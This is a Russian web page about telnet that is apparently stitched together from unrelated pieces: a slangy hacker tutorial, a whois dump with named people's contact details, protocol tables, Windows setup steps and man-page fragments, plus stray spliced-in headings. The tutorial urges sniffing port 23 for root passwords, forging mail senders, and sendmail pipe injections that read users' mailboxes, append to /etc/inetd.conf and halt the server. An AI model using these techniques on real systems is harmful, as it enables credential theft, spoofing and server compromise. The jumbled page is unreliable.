Проект OpenNet: MAN telnet (1) Команды и прикладные программы пользовательского уровня (FreeBSD и Linux)

Учимся использовать telnet #1

Часть первая. Хочу но не
могу.

Зачастую меня спрашивают ,
“Как типа телнет поюзать?” Гммм, ну начнем с
того что “телнет” в привычном понимании – 
это всего лишь терминал ,который позволяет
несчастному юзеру  стать клиентом
какого-нибудь сервиса завязанного на TCP/IP.
Соответственно, для начала нужно определиться
,куда нам нужно)) и нужно ли
нам это… Часто задаваемый вопрос номер два , а
где мне взять телнет клиента(терминал)? Ну
большинство начинающих странников (от слова
странный) даже не догадываются о том ,что телнет
клиент уже стоит на машине))) вызовите командную
строку дос и наберите там telnet (при условии ,что вы
уже подключены в сеть). Добрый windows порадует вас
на редкость кривым клиентом, не имеющим
возможности  настройки типа терминала.Гораздо
более приятно пользоваться универсальным
клиентом SecureCRT (http://www.vandyke.com).Если
у тебя стоит Linux или BSD ,то ты уже достиг
могущества и тебе осталось в X`ах вызвать консоль
и набрать telnet.
Коннект производится так:
telnet hostname/IP port
Где hostname/IP – имя хоста/IP на который ты решил
повеситься, port – номер порта, через который ты
собрался иметь удаленную систему.

Часть Вторая. Безвозвратно
погибшее прошлое.

Итак для чего изачально был
нужен этот чудо терминал? Для коннекта на порт 23,
который использует UNIX telnetd ,то бишь телнетный
демон. В результате ,после ввода имени
пользователя и пароля ты вываливаешся прямо в shell
и можешь управлять(с правами назначенными тебе
админом) удаленной машиной так же , как будто ты
сидишь непосредственно за ней))). Но в сем сервисе
было столько багов , что умные люди его давно
пофиксили и перешли на SSH. Основная проблема в
том, что юзер, нюхающий траффик в локалке по 23
порту может без проблем прочитать админовские
login&password (никакого шифрования) сплошной plain text.
БРРРРРР. Но если ты ,находясь в локальной сети
своей организации, набрал telnet servername и увидел
нечто типа:
Linux RedHat 6.0
login
Значит ты теперь можешь смело включать сниффер
на 23 порт и ловить пакетики)) Ну за один рабочий
день ты наверняка получишь рутовый логин и
пароль)))

Часть Третья. SendMail
зачастую все еще дыряв.

Гммм. Ну нафига нам сперся 23
порт )))? Попробуем поиметь через 25, то бишь sendmail.
Выглядит это примерно так:

telnet hostname 25
Trying 194.68.13.231…
Connected to gwx3.host.ru.
Escape character is ‘^]’.
220 gwx3.host.ru ESMTP Sendmail 8.9.3/8.9.3; Tue, 1 Aug 2000 08:54:59 0400
УРА ты повесился напрямую на 25 порт что дальше?
Дальше поздороваемся:
HELO domainname.com
(кстати имя домена может быть любое, но
желательно реально существующее к примеру YAHOO.COM)
далее пишем от кого письмо:
mail from : billgates@microsoft.com
– вот тебе и анонимность ….)))
теперь кому:
rcpt to : username
username – имя юзера которому шлем мыло, root – есть
всегда)))))
ну теперь сама мессага:
data – жмем Enter
здесь печатаем текст .
для того чтобы закончить послание ставим .(точку)
и жмем Enter
quit – валим отсюда))

ВСЕ!!! мы только что отправили
вполне анонимное мыло без всяких там клиентов)))
Радость в том ,что , зачастую, в sendmail есть
следующие баги:
1. mail from : sendername|any_command_as_U_want  – возможность
выполнения любой UNIX команды
rcpt to : username|any_command_as_U_want – возможность
выполнения любой UNIX команды
2. rcpt to : /any_directory/any_filename – возможность
направить мессагу напрямую в файл)))
Один гражданин ,назвавший себя VIRUSMAN недавно
прислал письмо где был следующий вопрос:
“А что мне это дает?” Ну что я могу сказать
………
В первом случае можно сделать нечто типа:
/bin/ls /var/spool/mail>/home/httpd/html/users_info.txt – получаем
список почтовых юзерей
/bin/cat /var/spool/mail/username>/home/httpd/html/user_box.txt
получаем контент ящика юзера.
/bin/echo any_commands_here>>/etc/inetd.conf – добавляем
произвольные команды в конец инет демона)).
/sbin/halt – паркуем сервак))) и т.д….

Во втором случае …)))
Ну попробуй подумать, пиши что хочешь и куда
хочешь))) Можно дописать произвольные команды
скажем в /etc/inetd.conf … все зависит от твоей
фантазии.

Часть четвертая,
прикладная пауза.

Ты конечно уже юзал проги
которые определят провайдера по IP)) Срочно сотри
их, больше никогда не юзай – вспомни про http://www.ripe.net.

На RIPE.NET запросы делаются так:
telnet whois.ripe.net 43
Trying 193.0.0.129…
Connected to whois.ripe.net.
Escape character is ‘^]’.
194.87.0.50
– пишем айпишник и получаем подробную
инфу кто это и откуда.
% Rights restricted by copyright.
See http://www.ripe.net/ripencc/pub-services/db/copyright.html

inetnum:     194.87.0.0 – 194.87.3.255
netname:     DEMOS-CORP
descr:       DEMOS Corporate Network
descr:       Demos Plus Co. Ltd.
descr:       Moscow, Russia
country:     RU
admin-c:     PA75
tech-c:      ED12-RIPE
tech-c:      GB90-RIPE
tech-c:      GK41-RIPE
status:      ASSIGNED PA
mnt-by:      AS2578-MNT
changed:     eugen@demos.net
19970313
changed:     galka@demos.net
19990804
source:      RIPE

route:       194.87.0.0/19
descr:       DEMOS
origin:      AS2578
notify:      noc@demos.net
mnt-by:      AS2578-MNT
changed:     eugen@demos.net
19970627
source:      RIPE

:/>  Ключи активации Office 365 2021 | Бесплатные программы

person:      Paul Antonov
address:     Demos Plus Ltd.
address:     Ovchinnikovskaya nab. 6/1
address:     Moscow 113035
address:     Russia
phone:       7 095 9566233
phone:       7 095 9566234
fax-no:      7 095 9565042
e-mail:      apg@demos.net
nic-hdl:     PA75
changed:     apg@demos.net 19960618
source:      RIPE

person:      Evgeny R Didenko
address:     Demos-Internet JSC
address:     6-1 Ovchinnikovskaya nab.
address:     Moscow 113035
address:     Russia
phone:       7 095 737-0436
phone:       7 095 737-0400
fax-no:      7 095 233 5016
e-mail:      eugen@demos.net
nic-hdl:     ED12-RIPE
notify:      eugen@demos.net
changed:     eugen@demos.net
19960415
changed:     eugen@demos.net
19991230
source:      RIPE

person:      Gera V Bragin
address:     Demos Company Ltd.
address:     6-1 Ovchinnikovskaya nab.
address:     Moscow 113035
address:     Russia
phone:       7 095 737 0436
phone:       7 095 737 0400
fax-no:      7 095 956 5042
e-mail:      gera@demos.net
nic-hdl:     GB90-RIPE
notify:      gera@demos.net
changed:     gera@demos.net
19970105
changed:     galka@demos.net
19991104
source:      RIPE

person:      Galina Kovalenko
address:     Genesys Telecommunications Lab.
address:     11, 2nd Obydenskiy pereulok
address:     Moscow 119034
address:     Russia
phone:       7 095 255 7940
fax-no:      7 095 255 7941
e-mail:      galka@genesyslab.ru
nic-hdl:     GK41-RIPE
remarks:     7 095 255 7940 ext 2051
notify:      galka@genesyslab.ru
changed:     galka@genesyslab.ru
20000731
source:      RIPE
Connection closed by foreign host.

Примечания

Шаблон:URI scheme

Основные протоколыTCP/IP

Прикладной уровень
HTTP, SMTP, FTP, DHCP, SSH, IRC, SNMP, DNS,
IMAP, NNTP, SIP, SMTP, TELNET, BitTorrent, rlogin
Транспортный уровень
TCP, UDP, SCTP, DCCP, RUDP
Сетевой уровень
IPv4, IPv6, ARP, ICMP, IGMP
Канальный уровень
Ethernet, 802.11 WiFi, Token ring, FDDI, PPP,
SLIP, ATM, DTM, Frame Relay, SMDS
Физический уровень
RS-232, EIA-422, RS-449, EIA-485

Структура команд telnet

Каждая команда TELNET является многобайтовой последовательностью, начинающейся с кода 377 (десятичное: 255) «Interpret as Command» (IAC) и кода команды. Команды, отвечающие за договоренности по опции, являются трехбайтовыми последовательностями, где третий байт является кодом опции. Нижеперечисленные коды и кодовые последовательности имеют соответственный смысл только когда следуют сразу за IAC.

НазваниеКод (десятичный/шестнадцатеричный)Описание
SE240/0xF0Завершает согласование, начатое командой SB.
NOP241/0xF1Нет операции.
Data Mark242/0xF2Синхронизация (Synch) обмена данными. Эта команда всегда сопровождается TCP Urgent notification.
Break243/0xF3Нажата кнопка «Break» или «Attention».
Interrupt Process244/0xF4Приостанавливает, прерывает, аварийно прекращает или завершает процесс.
Abort output245/0xF5Подавление вывода текущего процесса. Также отправляет сигнал Synch пользователю.
Are You There246/0xF6Отправляет обратно ответ терминала, состоящий из печатных символов.
Erase character247/0xF7Получатель должен удалить предыдущий символ, если это возможно.
Erase Line248/0xF8Стереть последнюю введённую строку, то есть все данные, полученные после последнего перевода строки.
Go ahead249/0xF9Ожидается передача данных.
SB250/0xFAНачало согласования опции, требующего передачи параметров.
WILL опция251/0xFBУказывает на желание исполнять или подтверждает, что сейчас исполняется указанная опция.
WON’T опция252/0xFCУказывает на отказ начать или продолжить исполнять указанную опцию.
DO опция253/0xFDЗапрос на то, чтобы другая сторона исполнила или подтвердила исполнение указанной опции.
DON’T опция254/0xFEТребование на то, чтобы другая сторона остановила исполнение или подтвердила то, что указанная опция более не исполняется.
IAC255/0XFFБайт данных 255.

Устройство

Хотя в сессии Telnet выделяют клиентскую и серверную сторону, протокол на самом деле полностью симметричен. После установления транспортного соединения (как правило, TCP) оба его конца играют роль «сетевых виртуальных терминалов» (англ.Network Virtual Terminal, NVT), обменивающихся двумя типами данных:

Хотя Telnet-сессии, выполняющейся по TCP, свойственен полный дуплекс, NVT должен рассматриваться как полудуплексное устройство, работающее по умолчанию в буферизированном строковом режиме.

Прикладные данные проходят через протокол без изменений[1], то есть на выходе второго виртуального терминала мы видим именно то, что было введено на вход первого. С точки зрения протокола данные представляют просто последовательность байтов (октетов), по умолчанию принадлежащих набору ASCII, но при включенной опции Binary — любых.

Хотя были предложены расширения для идентификации набора символов[2], но на практике ими не пользуются.

Все значения октетов прикладных данных кроме 377 (десятичное: 255) передаются по транспорту как есть. Октет 377 передаётся последовательностью 377377 из двух октетов. Это связано с тем, что октет 377 используется на транспортном уровне для кодирования опций.

Как работать с оболочкой?

Для того чтобы использовать функции команды telnet, нужно воспользоваться командной строкой. В седьмой версии Windows и выше служба по умолчанию отключена и автоматически при вызове команды не запускается. Поэтому необходимо выполнить следующие действия, чтобы включить telnet:

  1. В строке поиска меню «Пуск» набрать фразу «компоненты Windows»;
  2. Запустить найденный элемент управления;Включение/отключение компонентов Windows
  3. Найти в появившемся окне «Клиент telnet» и активировать его галочкой;Компоненты Windows
  4. Подтвердить действие включения компонента кнопкой «ОК»;
  5. В Windows 7 нужно набрать в строке поиска «Командная строка». В более старых версиях операционной системы достаточно вызвать командную строку (Меню пуск – Пункт «выполнить» – «cmd»);Запуск командной строки
  6. В появившемся окне необходимо ввести «telnet» для входа в систему терминалов.Запуск telnet
:/>  Что такое UEFI и чем он отличается от привычного BIOS

Принтер и клавиатура nvt

Принтер NVT имеет неопределённую ширину каретки и длину страницы и должен иметь представление всех 95 печатных символов US-ASCII (коды с 32 по 126). Управляющие символы имеют следующие значения:

НазваниеКод (десятичный/шестнадцатеричный)Описание
NULL (NUL) *0/0x00Нет операции.
Line Feed (LF) *10/0x0AПереводит принтер на следующую строку печати, оставаясь на той же горизонтальной позиции.
Carriage Return (CR) *13/0x0DПеремещает принтер к левой границе текущей строки.
BELL (BEL)7/0x07Производит аудио или видеосигнал (но НЕ перемещает головку принтера).
Back Space (BS)8/0x08Перемещает головку принтера на один символ по направлению к левой границе.
Horizontal Tab (HT)9/0x09Перемещает принтер на следующую остановку горизонтальной табуляции. Остается неопределённым как сторона определяет и устанавливает эти остановки табуляции.
Vertical Tab (VT)11/0x0BПеремещает принтер на следующую остановку вертикальной табуляции. Остается неопределённым как сторона определяет и устанавливает эти остановки табуляции.
Form Feed (FF)12/0x0CПеремещает принтер к верхней части следующей страницы, оставаясь на той же горизонтальной позиции.

Поддержка действия символов, помеченных как *, обязательна. Прочие могут производить заданное действие или не производить никакого; одна сторона не обязана предполагать ничего определённого о поддержке конкретных необязательных управляющих символов другой стороной.

Последовательность «CR LF» должна обрабатываться как единый символ перевода строки и использоваться всякий раз, когда требуется их объединённое действие; последовательность «CR NUL» должна использоваться, где требуется только возврат каретки; и использования символа CR следует избегать в других контекстах.

Включение клиента telnet в windows

В Windows 10, Windows 8, Windows 7 и Windows Vista вам нужно включить Клиент Telnet в Функции Windows на Панели управления, прежде чем можно будет выполнять какие-либо команды Telnet. казнены.


Клиент Telnet уже установлен и готов к использованию как в Windows XP, так и в Windows 98.

  1. Откройте панель управления.Очень быстрый способ сделать это – найти в меню «Пуск» панель управления или выполнить контроль в диалоговом окне «Выполнить» ( WIN R ). ,

    Проект OpenNet: MAN telnet (1) Команды и прикладные программы пользовательского уровня (FreeBSD и Linux)

  2. Выберите Программа из списка элементов категории. Если вы видите множество значков апплета, выберите Программы и компоненты и перейдите к шагу 4.

    Проект OpenNet: MAN telnet (1) Команды и прикладные программы пользовательского уровня (FreeBSD и Linux)

  3. Выберите Программы и компоненты .

    Проект OpenNet: MAN telnet (1) Команды и прикладные программы пользовательского уровня (FreeBSD и Linux)

  4. Выберите Включить или выключить функции Windows в левой части окна.

    Проект OpenNet: MAN telnet (1) Команды и прикладные программы пользовательского уровня (FreeBSD и Linux)

  5. Установите флажок Клиент Telnet .

    Проект OpenNet: MAN telnet (1) Команды и прикладные программы пользовательского уровня (FreeBSD и Linux)

  6. Выберите ОК , чтобы включить Telnet.

Возможно, вам придется подождать несколько секунд или максимум несколько минут. При появлении сообщения «Windows завершила запрошенные изменения». закройте окно «Функции Windows» и «Программы и компоненты».

Безопасность

В протоколе не предусмотрено использование ни шифрования, ни проверки подлинности данных.

Поэтому он уязвим для любого вида атак, к которым уязвим его транспорт, то есть протокол TCP.

Для функциональности удалённого доступа к системе в настоящее время применяется сетевой протокол SSH (особенно его версия 2), при создании которого упор делался именно на вопросы безопасности.

Так что следует иметь в виду, что сессия Telnet весьма беззащитна, если только не осуществляется в полностью контролируемой сети или с применением защиты на сетевом уровне (различные реализации виртуальных частных сетей). По причине ненадёжности от Telnet как средства управления операционными системами давно отказались.

Telnet все еще используется сегодня?


Telnet редко используется для подключения к устройствам или системам. Большинство устройств, даже очень простых, теперь можно настраивать и управлять через веб-интерфейсы, которые более безопасны и просты в использовании, чем Telnet.

Telnet обеспечивает ноль шифрование передачи файлов, что означает, что все передачи данных, сделанные через Telnet, передаются в виде открытого текста. Любой, кто следит за вашим сетевым трафиком, сможет видеть имя пользователя и пароль, которые вводятся при каждом входе на сервер Telnet!

Предоставление кому-либо прослушивания учетных данных на сервере, очевидно, является очень большой проблемой, особенно с учетом того, что имя пользователя и пароль Telnet могут относиться к пользователю, имеющему полные, неограниченные права на систему.

Когда Telnet впервые начал использоваться, в интернете было не так много людей, и, соответственно, не было такого количества хакеров, как мы видим сегодня. Хотя он не был безопасным даже с самого начала, он не представлял такой большой проблемы, как сейчас.

В наши дни, если сервер Telnet подключен к Интернету и подключен к общедоступному Интернету, гораздо более вероятно, что кто-то найдет его и покажет его.

Тот факт, что Telnet небезопасен и не должен использоваться, не должен сильно беспокоить обычного пользователя компьютера. Вы, вероятно, никогда не будете использовать Telnet или работать с чем-либо, что требует этого

:/>  Как узнать пароль от Wi-Fi на Windows 10?

Применения

Исторически Telnet служил для удалённого доступа к интерфейсу командной строкиоперационных систем.

Впоследствии его стали использовать для прочих текстовых интерфейсов, вплоть до игр MUD и анимированного ASCII-art. Теоретически, даже обе стороны протокола могут являться не только людьми, но и программами.

Иногда клиенты telnet используются для доступа к другим протоколам на основе транспорта TCP, см. Telnet и другие протоколы.

Опции

telnet воспринимает следующие опции:

После установки (открытия) соединения, TELNET переходит в “режим
ввода”. TELNET попытается установить опцию LINEMODE (построчный
режим). Если это не удастся сделать, TELNET перейдет в один из двух
режимов ввода: либо в “посимвольный” режим (“character at a time”
mode), либо в “старый построчный” режим (“old line by line” mode), в
зависимости от того, какой из них поддерживается удаленной системой.

Когда опция LINEMODE установлена, обработка символов будет
выполняться на локальной системе, но под управлением удаленной
системы. Когда редактирование ввода или отображение символов
необходимо отключить, удаленная система передаст эту информацию.

В “посимвольном” режиме основная часть введенного текста будет
незамедлительно посылаться на удаленный хост для обработки.

Что собой представляет terminal network

При помощи команды telnet, несмотря на её невысокую функциональность, можно выполнить достаточно много задач, таких как:

  • проверка соединения с сервером при помощи открытого порта;
  • подключение к удаленным устройствам (модем, роутер или свитч) для передачи команды (перезагрузки, выключения или получения логов);
  • обновление микропрограммы (прошивка) сетевого оборудования или мобильного телефона;
  • передача файлов.

Многие считают, что такое соединение работает, как и большинство сетевых служб, по принципу клиент-сервер. Однако это не так. telnet – полностью двусторонняя служба с одинаковыми функциями и уровнями доступа.

Что интересно, сама программа включает минимальный набор функций, который содержит только опцию подключения и процесс аутентификации (проверки подлинности имени пользователя и пароля, которому разрешен доступ). Все остальные опции, как командные, так и системные, вызываются подключаемыми приложениями.

Команды

Поддерживаются следующие команды TELNET, причем можно набирать
только начальную часть команды, достаточную для ее однозначного
определения (это же истинно и для аргументов команд
mode, set,
toggle, unset, slc, environ и
display).

Ссылки

hosts(4),
inet(7),
rlogin(1),
sh(1),
stty(1)

Copyright 1994 Novell, Inc.
Copyright 1999 В. Кравчук,
OpenXS Initiative, перевод на русский язык

Выполнение команд telnet в windows

Команды Telnet очень легко выполнить. После открытия командной строки просто введите и введите слово telnet . В результате получается строка « Microsoft Telnet> », в которой вводятся команды Telnet.


Еще проще, особенно если вы не планируете выполнять свою первую команду Telnet с помощью ряда дополнительных команд, просто введите telnet и любую команду Telnet, как вы увидите в большинстве наши примеры ниже.

Чтобы подключиться к серверу Telnet, вам нужно ввести команду, соответствующую следующему синтаксису:

 порт telnet hostname 

Telnet games & дополнительная информация

По умолчанию пароль или имя пользователя Telnet отсутствуют, поскольку Telnet – это просто средство, которое кто-то может использовать для входа на сервер Telnet. Там нет пароля Telnet по умолчанию больше, чем есть пароль Windows по умолчанию.


Есть несколько приемов командной строки, которые вы можете выполнить с помощью Telnet. Некоторые из них довольно бесполезны, учитывая, что все это в текстовой форме, но вы можете повеселиться с ними.

Проверьте погоду в Weather Underground, используя только командную строку и протокол Telnet:

Использование

Если команда telnet вызвана без аргумента хоста, она входит в
командный режим, что показывает приглашение telnet>. В этом режиме
telnet воспринимает и выполняет перечисленные ниже команды. Если
telnet вызвана с аргументами, она выполнит команду open
(см. описание
команд telnet ниже) с этими аргументами.

Введение

Назначение протокола TELNET в предоставлении достаточно общего, двунаправленного, восьмибитного байт-ориентированного средства связи. Его основная задача заключается в том, чтобы позволить терминальным устройствам и терминальным процессам взаимодействовать друг с другом.

Файлы

$HOME/.telnetrc
настраиваемые пользователем параметры запуска telnet
/usr/lib/locale/локаль/LC_MESSAGES/uxtelnet
файл сообщений для текущего языка
(См. LANG в environ(5).)

Синтаксис


telnet [-8][-E][-L][-a][-d][-e управляющий_символ] [-l пользователь] [-n файл_трассировки] [-r][хост [порт]]

Как управлять службой?

После того, как вы зайдете в службу управления терминалом Windows, необходимо знать несколько команд для возможности управления. Есть такие варианты получения списка управляющих ключей:

Название

telnet – пользовательский интерфейс к удаленной системе,
использующий протокол TELNET

Описание

Команда telnet используется для связи с другим хостом по протоколу
TELNET.

Оставьте комментарий

Adblock
detector